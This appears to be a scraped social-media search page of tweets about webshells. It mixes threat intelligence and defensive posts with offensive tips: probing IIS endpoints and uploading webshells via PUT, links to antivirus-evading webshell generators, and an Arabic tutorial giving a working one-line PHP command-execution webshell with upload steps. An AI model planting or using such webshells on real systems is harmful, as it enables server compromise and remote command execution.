Explore tweets tagged as #WebShell
@rudradas01
Who am I?
10 months
Beginners looking at this: Again IIS 🤦‍♂️ Others: Time to hack :) Popular endpoints: /aspnet_client /trace.axd /global.asax Try target[.]com/><img> Often discloses info. Also, check if PUT method is enabled, if yes, then try uploading .aspx webshell or web.config.
5
90
578
@HackingTeam777
ӉѦСҠіИԌ ҬЄѦӍ
7 months
Undetectable WebShell https://t.co/MNCLbvjdMu
0
90
346
@pyn3rd
pyn3rd
10 days
#CVE-2025-55182: RSC RCE — It functions as an in-memory webshell backdoor, offering a significantly more covert foothold. Please verify this again on your own endpoint.
7
71
594
@Junior_Baines
Jacob Baines
10 days
In memory react4shell webshell. 🤌Stolen from https://t.co/KBkFFAvvPy and dropped into go-exploit framework.
0
24
118
@DefusedCyber
Defused
3 months
Actor mass exploiting CVE-2025-31324 (SAP Netweaver RCE) from 45.15.140.117 ( Pq Hosting Plus S.r.l. ) 🇳🇿 VirusTotal Detections: 0/94 🟢 Payload contains an obfuscated webshell 📷
0
10
29
@Officialwhyte22
Winston Ighodaro
2 days
I used a PHP webshell hidden in a 404 error page to maintain access on a breached server.
7
25
202
@malmoeb
Stephan Berger
6 months
An attacker downloaded a freely available webshell from GitHub and stored it under the installation path of the legitimate SAP installation in the recent SAP Visual Composer exploitation, "disguised" as a PHPMyAdmin file (see image). The code itself is relatively simple,
4
23
99
@James_inthe_box
James
11 months
#webshell #opendir #netsupport #rat at: https://appointedtimeagriculture\.com/wp-includes/blocks/post-content/ GatewayAddress=95.179.158.213:443 RADIUSSecret=dgAAAPpMkI7ke494fKEQRUoablcA
2
7
27
@yo_yo_yo_jbo
Jonathan Bar Or (JBO) 🇮🇱🇺🇸🇺🇦🎗️
9 months
Webshell *engineers*?
0
0
4
@_JohnHammond
John Hammond
21 days
Tracking down a rogue Windows service for webshell persistence -- just a teeny weeny PowerShell HTTP server wrapped with NSSM, showcased with Wazuh and their sweet new 4.14 release with visibility on IT hygiene 😎 Video: https://t.co/rQk6rV5dNg
4
59
389
@jamieantisocial
J⩜⃝mie Williams
3 months
i have 🅽🅾 clue how someone found this. https://t.co/lSe5mwVORI
22
134
2K
@cybersecuritysl
网安知识分享
7 months
【免杀】一个一键生成免杀的webshell工具 免杀火绒、D盾,哥斯拉可正常连接 https://t.co/LlvBWZ2ibp
0
14
52
@tial_cl
TIAL
3 months
🚨 #México | asm.gob[.]mx comprometido Existen 166 webshell en PHP (huellas 2012→2025). ⚠️¿Más de una década sin detección ni remediación? 👁️ Detección vía OSINT "This is the way " #Ciberseguridad #México #OSINT #CTI #Shell #infosec
4
19
80
@catc0n
Caitlin Condon
6 days
VulnCheck is releasing our in-memory webshell for #React2Shell, along with our initial access intelligence team's observations on variants, the public PoC ecosystem, detection challenges, potential payload modifications, and more. https://t.co/3LOL9QETtC
1
3
12
@Gi7w0rm
Gi7w0rm
5 months
That SharePoint thing is so bad. Attackers don't deploy a webshell or smth. They leak a core sensitive key of the system allowing to validly sign certain request. Even if you patch the instance, attacks still can use the keys in the future. Only rotating the Keys will fix that...
0
7
47
@ngosytuanbug
ngosytuan
3 months
Today i found a RCE in a bug bounty platform 1. found a bypass admin role with cve confluence 2. access and upload a plugin ( webshell) 3. turn on plugin in server and can run any system command HOPY THEY FAIR #BugBounty
8
14
168
@4osp3l
Gospel
5 months
Spring4Shell RCE vulnerability... this was identified as a bypass of the patch for "CVE-2010-1622" the vulnerability allows attackers to upload a "webshell" to the vulnerable server, achieving remote command execution. "Where there's a patch, there's a bypass"
5
15
123
@petri_ph
Dr Petri ph
6 months
A webshell that went undetected for years — #nextronresearch detection rules caught it early — and they keep getting better. 🧬 SHA-256: 6137386a6210c13153f540c9c9ae0625520f72ddae0412c5c636fed483b1c29c Make sure you're not already compromised — run a scan with thor.
2
4
30
@0xwejdan
wejdan.
4 days
6.مثال WebShell بسيط يعطيك RCE (تشغيل أوامر): نسوي ملف ثاني اسمه webshell.php ونحط: <?php system($_GET['cmd']); ?> نرفعه. لو انقبل، نروح للرابط: uploads/webshell.php?cmd=id/ وبيتنفّذ الأمر مباشرة. نقدر نبدّل id بأي أمر نبيه. لو اشتغل → عندك RCE كامل.
1
0
2